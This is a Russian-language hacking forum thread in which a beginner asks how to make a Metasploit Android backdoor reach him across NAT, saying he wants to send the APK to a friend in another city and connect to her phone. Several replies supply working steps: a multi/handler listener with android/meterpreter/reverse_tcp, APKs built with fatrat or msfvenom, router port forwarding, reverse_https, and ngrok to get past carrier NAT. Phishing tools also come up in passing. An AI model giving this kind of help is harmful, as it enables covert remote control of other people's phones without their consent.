Кто может продробно рассказать, как сделать проброс кали за nat, использую ее на virtualbox, сколько искал инфы не нашел!!!

скорее порты, тут дело в том, что хочу попробовать backdoor на другом компьютере не в локальной сети

gottfried сказал(а):

Было на форуме.
Это раз. https://codeby.net/threads/meterpreter-cherez-tor-prostoe-reshenie.61839/ (https://forum.antichat.xyz/threads/1621839/)
Есть еще в темах по metasploit, metapheter.


Спасибо, буду пробовать

gottfried сказал(а):

Было на форуме.
Это раз. https://codeby.net/threads/meterpreter-cherez-tor-prostoe-reshenie.61839/ (https://forum.antichat.xyz/threads/1621839/)
Есть еще в темах по metasploit, metapheter.


чет фигня полная получается

gottfried сказал(а):

Что именно не выходит? Конкретнее описывай проблему + скриншоты.
Мы ванговать не умеем.


сделал все, как в статье, только для андроида, установил тор, подключил hostname и тд, закинул приложение на телефон, запустил metasploit, все прописал, и сессия не появляется

NigaMan сказал(а):

сделал все, как в статье, только для андроида, установил тор,



Причем тут ТОР? Если ты на на ТОР хочешь получить связь - это не получиться
У тебя вируталка стоит на NAT - поставь сетевой мост, тем более у тебя андроид в одной сети. Ничего пробрасывать не надо. опиши подробную схему, которую ты желаешь реализовать.

ghostphisher сказал(а):

Причем тут ТОР? Если ты на на ТОР хочешь получить связь - это не получиться
У тебя вируталка стоит на NAT - поставь сетевой мост, тем более у тебя андроид в одной сети. Ничего пробрасывать не надо. опиши подробную схему, которую ты желаешь реализовать.


хочу получить удаленный доступ к созданному бэкдору, т.е. скинуть его, например подруге, которая живет в другом городе, и иметь возможность подключится к нему

ghostphisher сказал(а):

Причем тут ТОР? Если ты на на ТОР хочешь получить связь - это не получиться
У тебя вируталка стоит на NAT - поставь сетевой мост, тем более у тебя андроид в одной сети. Ничего пробрасывать не надо. опиши подробную схему, которую ты желаешь реализовать.


и виртуалька у меня через мост стоит

NigaMan сказал(а):

хочу получить удаленный доступ к созданному бэкдору, т.е. скинуть его, например подруге, которая живет в другом городе, и иметь возможность подключится к нему




1) Бекдор должен иметь тип реверса - сам конектиться после запуска
2) приложение бекдор для андроид может не сработать, сейчас надо учитывать такие факторы как ОС, телефон и т.д - просто содать apk и на - в 75% не катят. Тренеруйся на своем.
3) Тему с ТОР не рекомендую - крайне не стабильно
4) В каяестве реверса пробовать надо все и tcp и https

ghostphisher сказал(а):

1) Бекдор должен иметь тип реверса - сам конектиться после запуска
2) приложение бекдор для андроид может не сработать, сейчас надо учитывать такие факторы как ОС, телефон и т.д - просто содать apk и на - в 75% не катят. Тренеруйся на своем.
3) Тему с ТОР не рекомендую - крайне не стабильно
4) В каяестве реверса пробовать надо все и tcp и https


я все из этого пробовал, все работает, но только в моей локальной сети, а я хочу выйти за пределы своей локальной сети, но не знаю, как это сделать, я и порты в роутере пробрасывал, единственное из-за чего может не работать выход за локалку, это из-за второго роутера от ростелекома

NigaMan сказал(а):

я и порты в роутере пробрасывал, единственное из-за чего может не работать выход за локалку, это из-за второго роутера от ростелекома



1) в консоль пишем service apache2 start
2) делаем проброс 80 порта на порт 9999 ( 80 это локальный и 9999 внешний )
3) Подключаем свой смартфон к 3G инету ( без домашнего WiFi)
4) Узнаем свой IP в Инете
5) Пробуем браузером в смарте http://твой_Ip:9999

смотрим

ghostphisher сказал(а):

1) в консоль пишем service apache2 start
2) делаем проброс 80 порта на порт 9999 ( 80 это локальный и 9999 внешний )
3) Подключаем свой смартфон к 3G инету ( без домашнего WiFi)
4) Узнаем свой IP в Инете
5) Пробуем браузером в смарте http://твой_Ip:9999

смотрим



проброс 80 порта на порт 9999
узнал ip через 2ip
выдало вот это

NigaMan сказал(а):

проброс 80 порта на порт 9999
узнал ip через 2ip
выдало вот это



Что находится в папке /var/www/html/ ?

ghostphisher сказал(а):

Что находится в папке /var/www/html/ ?

Открой бразуером index.html

ghostphisher сказал(а):

Открой бразуером index.html

А если взять браузер и открыть локально? К примеру с браузера винды но http://ip тачки с Линукс порт по умолчанию 80

ghostphisher сказал(а):

А если взять браузер и открыть локально? К примеру с браузера винды но http://ip тачки с Линукс порт по умолчанию 80


не понял, я должен в браузере в винде открыть этот файл через http://192.168.**.**:80, так? если так, то не открывается

NigaMan сказал(а):

не понял, я должен в браузере в винде открыть этот файл через http://192.168.**.**:80, так? если так, то не открывается


да и 80 можно не писать

ghostphisher сказал(а):

да и 80 можно не писать


не открывается

NigaMan сказал(а):

не открывается



А апач запущен на кали?

запустил, ввел ip получилось это

NigaMan сказал(а):

запустил, ввел ip получилось это



Мана тулкит была использована? Смысл в следующем - порты у тебя норм, а это фигня похоже от твоих исптыаний разных утилит для фишинга, которые ты не зачистил. Теперь, открываешь лист порта с метасплоит и делаешь проброс его, а свой телефон на андроид юзаешь через 3G и кидаешь на него свои заготовки и тестишь

ghostphisher сказал(а):

Мана тулкит была использована? Смысл в следующем - порты у тебя норм, а это фигня похоже от твоих исптыаний разных утилит для фишинга, которые ты не зачистил. Теперь, открываешь лист порта с метасплоит и делаешь проброс его, а свой телефон на андроид юзаешь через 3G и кидаешь на него свои заготовки и тестишь


Теперь, открываешь лист порта с метасплоит и делаешь проброс его, про это можно поконкретнее?

NigaMan сказал(а):

Теперь, открываешь лист порта с метасплоит и делаешь проброс его, про это можно поконкретнее?




Все тоже самое как в локальной сети делал со своим андроидом и пробрось порт, ты же делал это с 80 и 9999

ghostphisher сказал(а):

Все тоже самое как в локальнгй сети делал и пробрось порт, ты же делал это с 80 и 9999


то есть, я запустил апачи и теперь повторяю процедуру? и про порт я не понял слегка, просто этим всего неделю, от силы 2 занимаю, и еще не все до конца понимаю)

NigaMan сказал(а):

то есть, я запустил апачи и теперь повторяю процедуру? и про порт я не понял слегка, просто этим всего неделю, от силы 2 занимаю, и еще не все до конца понимаю)



Ты писал - что уже делал в локальнгой сети и все получилось с получением сессии. Откуда тут у тебя Апач? Ты на что принимаешь связь от запущенного файла с нагрузкой? И на какой порт? Вот на который порт ожидаешь в метиаплоите связь его и прокидывай

ghostphisher сказал(а):

Ты писал - что уже делал в локальнгой сети и все получилось с получением сессии. Откуда тут у тебя Апач? Ты на что принимаешь связь от запущенного файла с нагрузкой? И на какой порт? Вот на который порт ожидаешь в метиаплоите связь его и прокидывай


use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.**.**
set lport 9999
exploit -j
все прописал, скинул apk файл на телефон запустил, но сессия так и не появляется
apk файл я создаю с помощью fatrat

NigaMan сказал(а):

exploit -j
все прописал, скинул apk файл на телефон запустил, но сессия так и не появляется
apk файл я создаю с помощью fatrat




в роутере прописал что у тебя 9999 идет на 9999 ?

И еще - не факт файл сработает. Из 100 если 1 сработает уже хорошо.

ghostphisher сказал(а):

в роутере прописал что у тебя 9999 идет на 9999 ?

И еще - не факт файл сработает. Из 100 если 1 сработает уже хорошо.


порт прописан

NigaMan сказал(а):

порт прописан



Пробуем reverse_https создать и порт возьми другой

ghostphisher сказал(а):

Пробуем reverse_https создать и порт возьми другой


lhost прописывает ipv4 или ipv6?

NigaMan сказал(а):

lhost прописывает ipv4 или ipv6?



Пропиши свой инет адрес который IP

a113 сказал(а):

А то что IP может быть серый? (как у меня)


вот скорее всего и у меня

NigaMan сказал(а):

вот скорее всего и у меня


не причем тут твой серый ip! Ты к порту апача связь получил? Получил. У тебя ТУПО не пашет твоя нагрузка, и тем более ты накидал на саой телефон уже много этих файлов, один и тот же порт указал.

У меня кстати, такая же проблема! Думаю проблема в модеме, который от МТС 3/4g! Я пробросил порт, создал правила + через cmd netsh, и порты менял и головой об стенку бился))) В итоге на 2ip при проверке открытия порта они рекламировали сервис hideme, при установки их клиента можно делать forwarding port ( пробросить порт) но их манагеры сразу мне голову съели что мол для какой игры, итд! Когда речь зашла что я верталетики устанавливаю) Они отключились))) ПРОСТО ТУПО ВЫКЛЮЧИЛИ ДИАЛОГ НА СТРАНИЦЕ))) Я ржал!))) Так вот, именно только эта схема сразу мне все сессии подарила! Далее, я стал разбираться в чем проблема, я и порты менял и систему раза 3 переустановил (правда виндовоз) и прогу пробывал PFPort как то так! Итог - нифига! Думаю модем мой Гауно) Хотя там пробросил все в разделе виртуальный сервер итд! Не помогло! И перегружал! так что буду следить за топиком! Может кто какую тулзу посоветует!

Если брать в пример обычную структуру сети [ВЫ]===>[РОУТЕР]====>INTERNET, то все выглядит так:

[ВЫ - в метасплоит указать свой локальный IP выданный роутером в локалке ]===>[РОУТЕР - сделать проброс порта : указать порт выбранный в параметрах метасплоит и указать какой порт надо открыть в для доступа из Инета]====>INTERNET

при создании полезной нагрузки для работы через Интернет надо вписывать ip адрес роутера в Инете и порт.

Народ! если кому интересно, то я разобрался малеха. за пределами фаервола вашего роута (на котором вы прокидываете порты) стоит еще один глобальный роутер(со своим фаерволом)!! через него не пройдет ни одна скатина. это роутер вашего провайдера. в итоге вы получается находитесь в локальной сети. доступ к вам пакетов из инета невозможен но есть выход. ngrok. установил на кали, зарегался, и нгрок дал мне обходной путь моего провайдера. он создал свой ип, который сидит на дефолтном порту, и перенаправляет мне на 192.168.1.1 по порту 4444 . вот такая делюга. создал пейлоад на андроид(указал айпишник нгрока), запустил. включил слушатель хендлер. слушаю 192.168.1.1. на порту 4444. прилетает сессия. но не открывается метерпретер.... счас вас почитал, что то там вместо msfvenom -p android/meterpreter/reverse_tsp нужно msfvenom -p android/meterpreter/reverse_https ..... немного не понятно. но нужно попробовать... если кто вкуривает подскажите..... если кому интересно про нгрок, распишу подробнее